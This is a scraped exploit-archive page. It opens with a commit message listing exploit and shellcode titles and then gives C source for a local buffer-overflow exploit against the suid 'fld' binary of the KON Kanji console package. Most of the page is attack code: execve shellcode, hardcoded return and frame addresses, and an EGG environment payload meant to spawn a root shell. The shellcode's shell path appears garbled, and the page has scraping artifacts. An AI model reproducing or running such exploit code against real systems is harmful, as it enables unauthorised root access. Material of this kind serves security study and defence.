880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
93 lines
No EOL
2.4 KiB
C
93 lines
No EOL
2.4 KiB
C
/*
|
||
source: https://www.securityfocus.com/bid/1371/info
|
||
|
||
KON (Kanji On Console) is a package for displaying Kanji text under Linux and comes with two suid binaries which are vulnerable to buffer overflows. "fld", one of the vulnerable programs, accepts options input from a text file. Through this mechanism it is possible to input arbitrary code into the stack and spawn a root shell. The other binary, kon, suffers from a buffer overflow as well. The buffer overflow in kon can be exploited via the -StartupMessage command line option, and fld via the command line options: -t bdf <file to be read>
|
||
*/
|
||
|
||
/* Exploit code for /usr/bin/fld
|
||
|
||
Compile with : gcc -o xp xp.c
|
||
|
||
Made by : E-Ligth (Hugo Oliveira Dias) 01/08/2000
|
||
*/
|
||
|
||
|
||
#include <string.h>
|
||
#include <stdlib.h>
|
||
#include <stdio.h>
|
||
|
||
#define OFFSET 0
|
||
#define BUFFSIZE 541
|
||
#define NOP 0x90
|
||
|
||
char shellcode[] =
|
||
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
|
||
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
|
||
"\x80\xe8\xdc\xff\xff\xff/bin/zh";
|
||
|
||
unsigned long get_esp(void) {
|
||
__asm__("movl %esp,%eax");
|
||
}
|
||
|
||
int main(int argc,char *argv[])
|
||
{
|
||
int bsize = BUFFSIZE;
|
||
int offset = OFFSET;
|
||
int i;
|
||
long *addr_ptr, addr;
|
||
char *ptr,*buf,*env;
|
||
char arg[30];
|
||
|
||
if (!(buf = malloc(bsize))) {
|
||
printf("Can't allocate memory.\n");
|
||
exit(0);
|
||
}
|
||
|
||
|
||
ptr = buf;
|
||
for (i = 0; i < bsize; i++)
|
||
|
||
*(ptr++) = shellcode[i];
|
||
|
||
buf[519] = 0x3c; /* Saved EBP 0xbffffa3c */
|
||
buf[520] = 0xfa;
|
||
buf[521] = 0xff;
|
||
buf[522] = 0xbf;
|
||
|
||
buf[523] = 0x10; /* Return Address 0xbffff710 */
|
||
buf[524] = 0xf7;
|
||
buf[525] = 0xff;
|
||
buf[526] = 0xbf;
|
||
|
||
buf[527] = 0x90; /* fp variable 0x804bf90 */
|
||
buf[528] = 0xbf;
|
||
buf[529] = 0x04;
|
||
buf[530] = 0x08;
|
||
|
||
buf[531] = 0xef; /* variable thats shouldn<64>t be destroyed 0xbffffbef */
|
||
buf[532] = 0xfb;
|
||
buf[533] = 0xff;
|
||
buf[534] = 0xbf;
|
||
|
||
buf[535] = 0x60; /* variable thats shouldn<64>t be destroyed 0x40013460 */
|
||
buf[536] = 0x34;
|
||
buf[537] = 0x01;
|
||
buf[538] = 0x40;
|
||
|
||
memcpy(buf,"-type \"",7);
|
||
buf[540] = '\0';
|
||
buf[539] = '\"';
|
||
|
||
memcpy(arg,"-type bdf ./code",16);
|
||
arg[16] = '\0';
|
||
|
||
env = (char *) malloc(bsize + 10);
|
||
memcpy(env,"EGG=",4);
|
||
|
||
strcat(env,buf);
|
||
|
||
putenv(env);
|
||
|
||
system("/bin/bash");
|
||
|
||
exit(0); |